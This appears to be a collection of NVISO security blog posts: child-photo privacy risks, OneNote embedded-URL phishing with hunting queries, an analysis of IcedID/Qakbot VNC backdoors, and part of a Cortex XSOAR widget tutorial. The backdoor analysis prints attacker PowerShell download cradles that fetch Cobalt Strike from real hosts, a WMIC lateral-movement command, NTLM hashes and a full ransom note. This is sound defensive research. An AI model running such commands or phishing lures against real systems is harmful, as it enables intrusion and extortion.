  • Remember in one of the previous paragraphs where we said “With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy.” Well, this type of technology automates the task.
  • Resources above mention a woman having found sexually explicit content through facial recognition. Imagine your child falling victim to revenge porn in the future and having those pictures exposed. Through PimEyes it may even be possible that such pictures are shown in the results together with pictures of when the victim was still a child.

Of course, in addition to these “extreme cases”, in the future it may very well be that possible employers don’t just google your name, but also search your face before an interview. The results may consist of shameful pictures you would rather not have an employer see. There could be a psychological effect as well; maybe in the past you were struggling with certain physical conditions (e.g. being overweight) or affected by other conditions which are no longer relevant at the time when someone tries to find your older pictures. Being confronted with that type of past content may be a painful experience.

Generation of previously non-existent content

We’ve all been playing around and having a lot of fun with ChatGPT, DALL-E, and other AI models. While it is is possible to generate a picture from a textual prompt, it is also possible to take an existing image and swap out parts of the image based on a textual prompt. What could possibly go wrong? OpenAI does mention following protections having been put in place: “… we filtered out violent and sexual images from DALL·E 2’s training dataset. Without this mitigation, the model would learn to produce graphic or explicit images when prompted for them, and might even return such images unintentionally in response to seemingly innocuous prompts … “ Let’s see what we are able to do with some stock photos.

Starting off from the same stock photo, I erased the bottom part – very amateuristically I admit – so that it can be completed again by DALL-E:

Using a fairly innocent prompt (“modify the image to portray the children at the beach in swimming gear”), which could however be the type of picture child predators are after, we get the following possible images (note that we have blurred the resulting images):

Alright, these first two images do indeed look like a fun day at the beach, with an inflatable tire, bucket, and what looks like sand. The third image on the other hand, did surprise me a bit. This time, the girls have received shorts and the middle child even has some cleavage generated (adding to our decision of blurring the image). Do note that this is the result with an innocent prompt, specifically mentioning it is about children, and with mitigations against the generation of explicit content built-in by removing sexual images from the training set. Let’s leave it at this for this photo and try to generate something a bit more suggestive starting from this stock picture resulting from “business woman” as a search term. When asking to “turn this into a pin-up model”, starting from just the neck and head, we are able to receive some spicier results:

So this is what we can create from a completely random picture on the internet without having any photo editing skills. Now imagine this result applied to pictures of children and the risks are obvious.

Taking things a step further, other applications may not have the same limitations applied to their training data and are as a result clearly biased towards female nudity. The popular avatar app “Lensa” is known to return nude or semi-nude variations of photos for female users, even when uploading childhood pictures, as evidenced in following articles:

Taking things another step further, certain apps or services are specifically aimed at the creation of sexually explicit content in the form of deepfakes. Deepfakes are computer-generated images or videos that make use of machine learning to replace the face or voice of someone with that of someone else. Usually this consists of fake pornographic material targeting celebrities. However, deepfake content of adult women personally known to the people wanting to create deepfakes is on the rise, in part due to the ease with which you can create such content or request to have this content created.

However, applying deepfake technology to photo or video content of children is unlikely to remain off-limits for some people and the report above states that already some of the victims of the DeepNude telegram bot appear to be under 18.

There is no doubt that artificial intelligence and machine learning are here to stay. With all of their legitimate and highly useful applications, there is inevitably the potential for abuse as well. The only thing we can do as cybersecurity professionals, parents, friends, … is limiting the attack surface as much as possible and trying to make those close to us aware of the dangers.

Tips on reducing the risks

Some general tips we can take into account to protect ourselves and our children include:

  • Determine for yourself and your children what kind of information you are willing to share online and make this desire clear to others. Respect other people’s wishes in this regard. Some people may not like it when you post a picture of them or their children on your social media, even if it is a group picture.
  • Share pictures privately instead of via social media, e.g. mail pictures of the birthday party to a selection of recipients instead of posting online.
  • If you do want to post pictures on your social media, limit the target audience to friends or people you know. As an extension, make sure you only accept connections of people you know.
  • Avoid metadata and limit details regarding location and other information that could give away a location. Some additional guidance on removing metadata provided by Microsoft here.

Conclusion

Public pictures can easily be scraped into huge collections that are used for different purposes. While traditional risks (such as sharing on the Dark Web) linked to pictures of children are well-known, emerging technologies such as artificial intelligence and machine learning have opened Pandora’s Box for potential abuse. These collections of gathered pictures can be used for facial recognition or generation of new, possibly explicit content. The resulting dangers may not only manifest now, but perhaps years in the future. As such, it is not only about protecting the child they are today, but also the adult they will become.

About the author

You can find Jonas on LinkedIn

Jonas Bauters

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing.
As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge.


OneNote Embedded URL Abuse

27 March 2023 at 07:00
OneNote Embedded URL Abuse

In my previous blogpost I described how OneNote is being abused in order to deliver a malicious URL. In response to this attack, helpnetsecurity recently reported that Microsoft is planning to release a fix for the issue in April this year. Currently, it’s still unknown what this fix will look like, but from helpnetsecurity’s post, it seems like Microsoft’s fix will focus on the OneNote embedded file feature.
During my testing, I discovered that there is another way to abuse OneNote to deliver malware: Using URLs. The idea is similar to how Threat Actors are already abusing URLs in HTML pages or PDFs. Where the user is presented with a fake warning or image to click on which would open the URL in their browser and loads a phishing page.

The focus of this blogpost will be on URLs withing a OneNote file that is delivered via an attachment. Not a URL that leads to OneNote online.

There are 3 ways to deliver URLs via a OneNote file.

  1. Just plainly paste your URL in the OneNote file (Clickable URL)
  2. Make some text (like “Open”) clickable with a malicious URL (Clickable text)
  3. Embed URLs in pictures (Clickable picture)

Now it is important to note that these 3 ways rely on social engineering and tricking the user to click your URL or picture, either via instructions or deceiving the user. We have seen this technique being used through OneDrive and SharePoint online already

So, let’s create some examples and see what this attack could look like.

URLs in OneNote

Clickable URLs

The most straightforward way is to just put a URL in a OneNote file. In an actual phishing email, the OneNote file will probably not just contain the URL alone. To make things more believable, Threat Actors could potentially write a small story or an “encrypted” message in the OneNote file (an example of this can be observed below). The idea would then be to convince the user into clicking the URL in order to “decrypt” the message. Once clicked on the URL, the user would then either have to download something or provide credentials to “log in”.

If you would like to read the message in the OneNote file, you would have to click the URL. Which could then lead to the download of a malicious file or a credential harvest page.
An example of such an “encrypted” message could be:

An example of a fake encrypted message where a user has to click a URL to decrypt it

Clickable text

Similar to clickable URLs, you can hide a URL behind normal text. Once you hover over the URL, you will see where it points towards. If the address points to wards a malicious domain that uses typo squatting (e.g. g00gle[.]com instead of google[.]com) then Threat Actors could fool the human eye.

The text “open” hiding a malicious URL


The issue here lies in the fact that once you click the “open” text, you will immediately be redirected to the website. There is no pop up asking if you really want to visit the website.
Taking this technique into account, it is also possible to use our “encrypted message” example from before and make the user think they will visit a legitimate page but embed a different URL:

The visible URL “https://microsoft.com&#8221; is hiding a malicious URL

Clickable Pictures

To create an embedded URL in a picture, right-click your picture, and Click “Link…”


Here you can put a URL to your malicious file or phishing page. Yes, you could spin this story so that you would have to authenticate and login, to your browser with a fake login website.
Do note that to open a URL that is embedded within a picture, you will need to hold the CTRL key and click the image. The phishing document will have to instruct the user to hold CTRL and click the picture; however, I do not see this as an obstacle for threat actors.

A picture with the button “open” that has an embedded malicious URL

Detection Capabilities

On OneNote Interaction

Opening the URL, will launch the default browser. This can be translated to OneNote spawning a child process, which is the browser. A full process flow could look something like this:

Process execution of explorer.exe > Outlook.exe > OneNote.exe > firefox.exe


Do note that, as typically done so by Outlook, once you click the file, it saves a copy in a temporary cache folder (depending on your version of outlook, this can be a slightly different place than is shown above here, but generally, you will have the name INetCache and Content.Outlook in the folder path.)

A quick hunting rule for this behaviour can be to look for the process tree that was observed before. This process tree can be adjusted to the needs of your environment, depending on what browser is being used (e.g. if you are running brave.exe, you should include this in the “FileName” section of the query)

DeviceProcessEvents
| where InitiatingProcessFileName contains "onenote.exe"
| where FileName has_any ("firefox.exe","msedge.exe","chrome.exe")

Now if you’d like a more “catch all” approach, the last line can be replaced with a query that looks at the command line and looks for http or other protocols like ftp, as both chromium & Firefox-based browsers accept URLs as a command line argument to open a specific website.

| where ProcessCommandLine has_any ("http","ftp")

On Email Delivery

During our tests, Microsoft Defender was unable to detect and extract the URLs that were embedded in the OneNote file, as can be observed in the screenshot below. Defender was unable to extract the URLs from the OneNote files, nor was it able to show that a URL was embedded in the file.

No URLs extracted from the OneNote Attachment


This also means that Microsoft does not create a safe link for the URL and thus a threat actor can bypass the “potential malicious URL clicked” alert which helps against phishing pages, as this looks at URL clicks, which is impossible if no URLs are detected

Conclusion

Whilst embedded files within OneNote are currently still a big threat, you shouldn’t forget that there are other ways of abusing OneNote features that can be used for malicious intent. As we observed, Microsoft does not extract the URLs from a OneNote file and there are multiple ways of avoiding detection & tricking the user into clicking a URL. From there, the same tactics are used to deliver second stage malware, be it via ISO file or ZIP file that contains malicious scripts.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

IcedID & Qakbot’s VNC Backdoors: Dark Cat, Anubis & Keyhole

20 March 2023 at 14:45
IcedIDQakbot

IcedID (a.k.a. BokBot) is a popular Trojan who first emerged in 2017 as an Emotet delivery. Originally described as a banking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker mostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt Strike prior to a multitude of ransomware strains such as Conti or REvil.

IcedID itself is composed of multiple modules, one of which is a poorly documented VNC backdoor (Virtual Network Computing) acting as a cross-platform remote desktop solution. Existence of this module (branded “HDESK” or “HDESK bot”) is just partially mentioned by Malwarebytes (2017) and Kaspersky (2021) while its usage has been widely observed and occasionally vulgarized as “Dark VNC”.

As part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command & control communications. In this blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s perspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and public captures published by Brad Duncan.

In this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll follow by exposing common techniques employed by the operators before revealing information they leaked through their clipboard data.

Bokbot or Qakbot?

This research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis & Keyhole” and focused solely on IcedID (Bokbot). Brad however correctly pointed-out that Dark Cat is only leveraged by Qakbot, samples which were mistakenly included in this research after being confused with Bokbot (IcedID).

IcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.

HDESK Variants

During our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants, all part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor to create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat actors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or executing commands through the Command Prompt and PowerShell.

We believe with medium confidence that these backdoors share origins as the the Dark Cat interface (used by Qakbot) has traits that can later be found within Anubis and Keyhole interfaces (used by IcedID).

Dark Cat VNC

The “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and v1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. Upon initial access, the home screen presents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.

Figure 1: The Dark Cat VNC interface.
Figure 1: The Dark Cat VNC interface.

User Session

Figure 2: A Dark Cat USER session.

The USER session exists in three variations (read, standard and black) which allows the operator to switch the VNC view to the user’s visible desktop.

HDESK Session

The HDESK session exists in three variations as well: standard, Tmp and NM (also called bot). This session type causes the backdoor to create a new hidden desktop not visible to the compromised user.

Based on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.

Figure 3: A Dark Cat HDESK session.

As HDESK sessions by default do not benefit from Windows’s built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt, Run and the Task Manager. A Windows Shell button is also foreseen which we believe, if used, will spawn the regular Windows UI most of the users are used to. Starting with Dark Cat v1.1.3 Edge Chromium furthermore joins the list of available software.

Figure 4: The Dark Cat HDESK session interface.
Figure 4: The Dark Cat HDESK session interface.

Besides the alternate start-menu, operators can access some settings using the top-left orange icon which includes:

  • Defining the hidden windows’ sizes.
  • Defining the Chrome profile to use (lite or not).
  • Deleting the browser’s profile(s).
  • Killing the child process(es).
Figure 5: The Dark Cat HDESK settings interface.

WebCam Session

The WebCam sessions exist in three variations. While we were unable to capture its usage (honeypots lack webcams and operators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing compromised devices’ webcam feeds.

Anubis VNC

The “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by IcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat v1.1.3.

Figure 6: The Anubis VNC interface.
Figure 6: The Anubis VNC interface.

KEYHOLE VNC

The “KEYHOLE VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well as v2.1. Its usage was observed as recently as Q1 2023.

Grayscale

The first major change observed within Keyhole is its new color palette capability where operators can pick regular RGB (a.k.a. colored) or Grayscaled (a.k.a. black & white) feeds. The actual intend of this feature is unclear as, at least from a network perspective, both RGB and Grayscale consume as many bytes per pixel, resulting in equal performances.

Figure 7: The Keyhole color palette selector.
Figure 7: The Keyhole color palette selector.

HDESK Sessions

Keyhole v1.3 provides a refreshed start-menu where icons have been updated and options renamed; The once cryptic Win Shell option has been rebranded to the My Computer option.

Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.
Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.

Later-on, with v2.1, Keyhole renamed additional options and introduced the PowerShell and Desktop options. We assess with low confidence that the Desktop option only differs from the My Computer option by rendering the background as well, whereas the latter option was only seen generating desktop views without background image.

Figure 9: The Keyhole (v2.1) HDESK session interface.
Figure 9: The Keyhole (v2.1) HDESK session interface.

Modus Operandi

Obtaining recordings of threat actors operating is useful to understand which technical capabilities they are equipped with, but also allows the identification of TTPs (Tactics, Techniques & Procedures) they might employ. In the following section we will review some of the most re-occurring actions we observed IcedID and Qakbot operators perform through the above described backdoors.

🍯 Nothing confidential here…
All media published within this section were reconstructed from publicly published artifacts. As all information is public, we have refrained from redacting otherwise sensitive details such as company names and accounts.

Task Manager

To no surprise, the usage of the Task Manager to identify running software was extremely common. While hard to detect as operators did not attempt to interfere with security software, the usage of this graphical utility outlined one interesting drawback. On multiple (non-published) occasions we observed actors identifying known security tooling based on the process icon whereas other icon-less tooling blended in with many of Windows’ icon-less applications.

Figure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.

Outlook

Another quite common technique was the inspection of Outlook, most likely to identify poorly-populated honeypot networks. As was the case for the Task Manager, the graphical usage of Outlook by the operator is indistinguishable from regular user activity. From the available recordings, no attempts were made to use Outlook for further phishing/spam.

Figure 11: An Dark Cat operator performing interactive reconnaissance through Outlook.
Figure 12: A Dark Cat operator inspecting Outlook's "Rules and Alerts" settings.
Figure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.

On one singular instance, we observed the actor expressing interests in Outlook’s rules. The backdoor session was however terminated before they undertook any actions making it unclear whether this was part of the reconnaissance activities or were planning to set up malicious email redirection rules.

Web Browsers

From the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s connectivity by accessing Amazon.

During one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information. This attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.

Figure 13: A Dark Cat operator accessing Amazon's "Your Payments" account page.
Figure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.
Figure 14: A Keyhole operator inspecting Edge's version details.
Figure 14: A Keyhole operator inspecting Edge’s version details.

On some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to attackers, the capture provides a sheer amount of uncommon flags usable for threat hunting.

Noteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir= flag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. The pattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe.

Also worth noting is the usage of edge://settings/passwords to identify additional accounts.

Figure 14: A Keyhole operator interactively inspecting Edge's stored passwords.
Figure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.

A final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge resulting in a notification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon, as opposed to Electron-based applications (including Microsoft Teams and WhatsApp) who extensively use it.

Explorer

Another commonly observed utility to inspect the compromised devices’ files and folders, including payloads dropped through other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from legitimate use making it a hard to detect technique.

Figure 16: A Keyhole operator interactively using Explorer to inspect folders.

Command Prompt

Last but not least, the command prompt was obviously used extensively. Usage of the command prompt is commonly leveraged for reconnaissance activities, including the usage of:

  • whoami /upn for system user discovery (T1033).
  • ipconfig for system network configuration discovery (T1016).
  • arp -a for both remote system discovery (T1018) and device identification based on the MAC address.
  • dir for file and directory discovery (T1083) over SMB (T1021.002).
  • nltest /dclist for the remote discovery of the domain controllers (T1018).
  • ping for network connectivity tests to remote systems (T1018).
  • PowerShell (T1059.001) to deploy Cobalt Strike.

As opposed to the previous mostly passive TTPs, the active usage of the Command Prompt and PowerShell is often where detection rules obtain a competing chance.

Figure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK session.

Clipboard Leaks

As VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By copy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding their operations.

In this section we will expose the most common and interesting data found within their clipboards.

Cobalt Strike

As expected, many variations of Cobalt Strike downloaders were observed. These leveraged both IPs and domain names, as well as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080.

IEX ((new-object net.webclient).downloadstring('http://89.163.251.143:80/a'))
IEX ((new-object net.webclient).downloadstring('http://146.0.72.85:443/waw')) 
IEX ((new-object net.webclient).downloadstring('https://searcher.host/a80lvl'))
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))"

In some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA

For compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote appliances.

C:\Windows\System32\wbem\wmic.exe /node:10.6.21.140 process call create "cmd.exe /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))"""

Finally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a naming convention.

plugin_cobalt_126_8888
plugin_cobalt_126_8080
plugin_cobalt_126_443

Rundll32

Besides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with rundll32.exe and attributed to the deployment of a VNC backdoor.

DllRegisterServer --id %id% --group %group% --ip 87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223

NTLM Hashes

Another interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope. In this case, the impacted organization was part of a honeypot environment.

DESKTOP-4GDQQL7\admin 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\Administrator 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4
DESKTOP-4GDQQL7\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4
TECHHIGHWAY-DC\krbtgt a7b565c147b69380d0b35f37ce478a1c

Attacker Notes

While the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“[...]” trimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well information on then-ongoing breaches. A couple of days after the network traffic was taken, two non-honeypot companies mentioned within these notes were listed on the Black Basta ransomware group’s leak site.

[...]
Hostname CTYMNGR1 =ist  ne v domene
Hostname PCCXCNAU001 (4)-no ad/da/error 
Hostname W10EQZAFI10027 -?ff ne prishla
Hostname NPD104 -24 host (7)
Hostname DESKTOP-3R921OV -small
[...]
Hostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices? 
Hostname PC-REC-LEFT-10 --???? ? ?? ????
Hostname TRAINING - w craneserviceco.com 20m (???) razobral
[...]
Hostname RM6988 msystemscompany.com 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ???????? ??????? 
Hostname EXIRP316151 ?????? ?? ????? ???????
Hostname ADMIN201 ???? ? ???
[...]
Hostname ODSCHEDULING  [...] 12m work7---yshla v off
Hostname MDC1104 [...] 11m istok razobral

Ransom Notes

Another recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team. While this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the access broker ecosystem.

Ok, you are reading this - so it means that we have your attention.
Here's the deal :
1. We breached your internal network and took control over all of your systems.
2. We analyzed and located each piece of more-or-less important files while spending weeks inside.
3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).

FAQ:
- Who the hell are you?
- The Karakurt Team. Pretty skilled hackers I guess.

- WHY ARE YOU DOING THIS?!??
- Our motivation is purely financial.

- We are going to report this to law enforcement.
- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if you will later change your mind and decide to pay - they will not let you.

- Who else already knows about the breach?
- Only You, who received the same message the same way. Nobody else. For now.

- What if I tell you that I do not care and going to ignore this incident.
- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will start notifying your employees, clients, partners, subcontractors and any other persons that should know how you treat your own corporate secrets and theirs.

- What if I will not contact you even after it?
- Than we shall move forward and start contacting your business competitors and list of anonymous inside traders we deal with, to find out if they are going to pay us for your data. When the list of the people who is interested in such data is formed - the closed online auction starts.

- None will buy what you took! I do not believe you!
- If the auction fails - we will just leak everything online, making sure that this leak goes straight to the press. We will make sure that your business will bleed by using any power we have in our posession, both social and technical.

- What happens if I pay?
- Nothing bad will happen.
We will remove everything we took from your network and leave you be.
We will provide the confirmation that the data is deleted.
We will help you to close technical vulnerabilities you have and provide some insight on how to avoid such incidents if some other perpetrator is interested in you.
We will never tell anybody about it.

- We understand. We are ready to move forward.
- You will find the Access Code at the end of this file, you will need this one to get in contact with us for further instructions

To contact us using this ID you should do the following :
1. Download Tor browser - https://www.torproject.org and install it.
2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.
4. The chat window will open and we will be able to communicate through a secured channel.

This link is available via "Tor Browser" only!


As a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well. Just let us know if you are interested in cooperation.

Key Takeaways

While it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse), distinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on command-based executions without considering what could otherwise be considered legitimate user processes such as web browsers or Outlook. Understanding how these backdoors operate improve responsive and forensic capabilities by, for example, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.

This blog post further outlined the capability of network-level visibility which, for complex or BYOD (Bring Your Own Device) environments, may cope with the lack of endpoint visibility. Within this spirit, we would like to outline the effectiveness of the Snort IDS rules published by Networkforensic with regards to the detection of IcedID command & control communications.

If you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out; NVISO can help!

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – number widgets

28 February 2023 at 08:00
Cortex XSOAR TipsTricks – Leveraging dynamic sections

Introduction

Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC is data visualization, analysts can be swarmed with information, and finding out what piece of data is currently both relevant and significant can become hard. One of our tasks as SOAR engineers is to ease the decision process for analysts, we do so by providing additional contextual information about the incidents they handle, directly within the incident layout. In this objective, we incorporate number widgets into the analyst interface, these allow us to tell more visual stories about the security incidents we manage in XSOAR. From raw and sometimes unorganized data, they let us bring up eye-catching depictions of elements that can help in assessing the impact and veracity of a detection.

Objectives

In this blogpost, we will focus on the use of number widgets.

We will show you how to make use of them for outputting information to the war room, incidents, indicators and dasbhoards. On top of that we will also cover how to add trends information and even how to integrate them into a dashboard with a dynamic query. In the previous post in the series, we looked at dynamic sections in Cortex XSOAR and how to leverage them to display text in a tree like way. If you are not familiar with Cortex XSOAR and dynamic sections, please read the previous post in the series.

We previously saw that we could use dynamic dections to display text, but there are a few other options available to us. These options are broken down here. In this post, we will:

  • Start with a simple example that runs a static query against Microsoft Sentinel and lets us display a single number widget.
  • Continue with extracting a second number from our query to populate the trend of the number we display.
  • Bring our widget to a dashboard
  • Make our dashboard widget read the date range selected by the user and modify the Sentinel query accordingly.

Let’s begin with a new automation and follow the instructions available in the number widget example of the PaloAlto documentation. When we run their example, we get the following result:

Figure 1: War Room output of the code example available in the Cortext XSOAR documentation

As expected, the example works out of the box. Let’s now go and make the widget display data from Microsoft Sentinel.

A static number from sentinel

To display data pulled from Microsoft Sentinel (Microsoft Azure’s cloud native SIEM), we first need to call an integration command. Here we use an instance of the Azure Log Analytics integration available in the Cortex XSOAR marketplace:

res = demisto.executeCommand(
	"azure-log-analytics-execute-query", {
		"query": THE_QUERY
	}
)

We need a query to run, we will develop it on Sentinel before using it from Cortex XSOAR.

We will be looking at entries in SecurityIncident, a table that holds information about the security incidents present in your Sentinel deployment. We will query that table, and count the number of distinct incidents in a given month. The query we will use for that is the following:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")
    ..
    datetime("2022-11-01T00:00:00+00:00"))
| summarize count()
Figure 2: Screenshot of a Microsoft Sentinel query and it’s results: single value

Now that we know our query works, we will port it to Cortex XSOAR. We start by duplicating our previous automation and adding code to call the integration with the Sentinel query.

res = demisto.executeCommand("azure-log-analytics-execute-query", {
"query": """SecurityIncident
| where TimeGenerated between(
	datetime("2022-10-01T00:00:00+00:00")
	..
	datetime("2022-11-01T00:00:00+00:00"))
| summarize count()"""
})

We need to extract the count_ we could observe in the results of Sentinel, let’s inspect the res object returned to us by the integration.

Figure 3: Debug view in PyCharm

Upon inspection of the returned object, we identify that we can use the following logic to extract the count of incidents

counts = []

for result in results:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if (
            isinstance(content, dict)
            and
            isinstance(count := content.get("count_"), int)
        ):
            counts.append(count)

total_count = sum(counts)

With the total_count obtained, we can simply change the hardcoded number from our previous widget and replace it with the value we just fetched:

demisto.results(
    {
        "Type": 17,
        "ContentsFormat": "number",
        "Contents": {
            "stats": total_count,
            "params": {
                "name": "Incidents Last Month",
                "colors": {
                    "items": {
                        "green": {
                            "value": 40
                        }
                    }
                }
            }
        }
    }
)

In the snippet above we use demisto.results(), this function let’s us write to the standard output that will be read by Cortex XSOAR. More possibilities for returning data from an automation are available in this documentation page: Python code conventions, returning data. Here we use the type 17 in the data we return, this is the type associated to widgets, the list of all defined types is available here.

Upon running our new automation, we get the exact same number previously obtained through Sentinel:

Figure 4: War room view of the widget outputted by the “Single value from Sentinel” code snippet

Adding a trend

We already have the number of alerts from last month pulled into XSOAR and displayed as a widget, let’s continue and also pull the count for the previous month. Our query to Sentinel now becomes:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")..
    datetime("2022-11-01T00:00:00+00:00"))
| extend same = 1
| union (
    SecurityIncident
    | where TimeGenerated between (
        datetime("2022-09-01T00:00:00+00:00")..
        datetime("2022-10-01T00:00:00+00:00"))
    | extend same = 2)
| summarize count() by same
Figure 5: Screenshot of a Microsoft Sentinel query and it’s results: two values

Correspondingly, our querying and extracting code becomes:

this_month_counts = list()
last_month_counts = list()

lookup = {
    1: this_month_counts,
    2: last_month_counts
}

for result in results:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if not isinstance(content, dict):
            continue
        if not isinstance(raw_same_target := content.get("same"), int):
            continue
        same_target = lookup.get(raw_same_target)
        if (
            same_target is not None
            and
            isinstance(count := content.get("count_"), int)
        ):
            same_target.append(count)

total_this_month_counts = sum(this_month_counts)
total_last_month_counts = sum(last_month_counts)

As for the data returned to Cortex XSOAR, the only change is on the stats key which now becomes:

"stats": {
	"prevSum": total_last_month_counts,
	"currSum": total_this_month_counts
}

The resulting widget looks as follows:

Figure 6: War room view of the widget outputted by the “Dual values from Sentinel” code snippet

Moving to incidents and indicators

Until now, we have been displaying our widgets in the war room, however we can also add them to incident and indicator layouts as well. As a reminder, the procedure to add General Purpose Dynamic sections to an incident can be found here: Add a Script to the incident Layout.

Our existing widgets are already compatible with incidents and indicators, after following the instructions above on how to add widgets to incidents, we can get the following layout tab. In a similar fashion after adding the dynamic-indicator-section tag to all three automations, you can also add them as widgets to an indicator layout:

Figure 7: Incident VS Indicator view of the three widgets

Moving to a dashboard

Rendering widgets in a dashboard is actually easier than in an incident layout, to verify this, let’s compare the methods to output a simple number widget, both for an incident and for a dashboard. For an incident, as we already saw earlier, you need to return the actual number, but it needs to be wrapped appropriately:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": 53,
        "params": {
            "layout": "horizontal",
            "name": "Lala",
